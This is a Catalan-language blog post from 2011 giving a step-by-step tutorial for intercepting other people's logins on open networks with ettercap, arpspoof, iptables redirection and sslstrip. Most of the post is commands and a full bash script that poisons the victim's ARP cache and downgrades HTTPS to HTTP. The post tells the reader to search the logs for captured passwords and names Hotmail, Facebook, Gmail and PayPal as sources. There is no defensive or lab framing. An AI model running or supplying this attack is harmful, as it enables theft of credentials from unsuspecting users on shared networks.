El Blog de Vinsentvega ;)

Un blog de tot un poc

sslstrip, capturant dades.

Posted by VinsentVega a 28 Mai 2011


Redirigir el trafic https a conexions http, burlant per tant l’avís de certificat fals i capturant en xarxes obertes.

sudo apt-get install ettercap

sudo gedit /etc/etter.conf

Anem a les línies d’iptables, les descomentem i les deixem així:

# if you use iptables:

redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”

redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”

Ens baixem el següent paquet: ssltrip v.07

El descomprimim en una carpeta i entrem al directori del sslstrip, ahí executem la següent ordre:

cd /home/usuari/ubicaciodesslstrip sudo python setup.py install

Obrim una consola i posem el següent script:

sudo gedit sslscript.sh

#!/bin/bash

echo 1 > /proc/sys/net/ipv4/ip_forward

echo -n “Direcció IP del router ( route ): “

read routerip

echo -n “Interfaç on anem a capturar (ex: wlan0): “

read iface

sudo xterm -geometry 75×15+1+300 -T “ARP Spoof” -e arpspoof -i $iface $routerip &

sleep 2

sudo iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000 &

echo “Routed IP Tables”

sudo xterm -geometry 75×15+500+300 -T “SSL Strip – Si tanques esta finestra se demanarà certificat” -e sslstrip -a -k -f &

echo “SSL Strip Launched successfully”

sleep 2

sudo xterm -geometry 75×15+500+300 -T “Finestra de logs de captures” -e tail -f sslstrip.log &

sudo xterm -geometry 75×15+1000+300 -T Ettercap -e ettercap -T -q -i $iface

killall sslstrip

killall arpspoof

Guardem el fitxer i li donem permisos d’execució:

chmod u+rwx sslscript.sh

Executem l’script i posem les següents dades que ens demanarà:

Direcció ip del router (Per saber-la nostra pasarel·la ):

route

Nom de la nostra interfície (des d’on anem a capturar( wlan0, wlan1, eth1 … etc )):

iwconfig

Obrim la consola i posem :

sudo bash sslscript.sh

S’obriran 4 finestres :

  1. Finestra de Arpspoof per a enganyar a la víctima i dir-li que el nostre equip és ara la seua pasarel·la
  2. Finestra Sslstrip ( és la que se bota el certificat )
  3. Finestra Ettercap ( podem vore les conexions des de esta finestra i si no la tanquem, les contrasenyes es començaran a capturar en esta finestra, s’ha de tindre amb compte que li ixiria una finestra d’avís a l’equip en qüestió avisant que el certificat és fals)
  4. Finestra de log : és una finestra on s’anirà vegent les passwords.

Quan acabem podem utilitzar l’ordre tail amb grep :

tail -f sslstrip.log | grep login

Esta ordre buscaria la paraula login en el fitxer generat, i sinó estiguera la paraula “login”podríem buscar amb:

tail -f sslstrip.log

Amb açò obtenim passwords de conexions segures : hotmail, facebook, gmail , paypal ...
Advertisements

Deixa un comentari

Fill in your details below or click an icon to log in:

WordPress.com Logo

Esteu comentant fent servir el compte WordPress.com. Log Out / Canvia )

Twitter picture

Esteu comentant fent servir el compte Twitter. Log Out / Canvia )

Facebook photo

Esteu comentant fent servir el compte Facebook. Log Out / Canvia )

Google+ photo

Esteu comentant fent servir el compte Google+. Log Out / Canvia )

Connecting to %s

 
%d bloggers like this: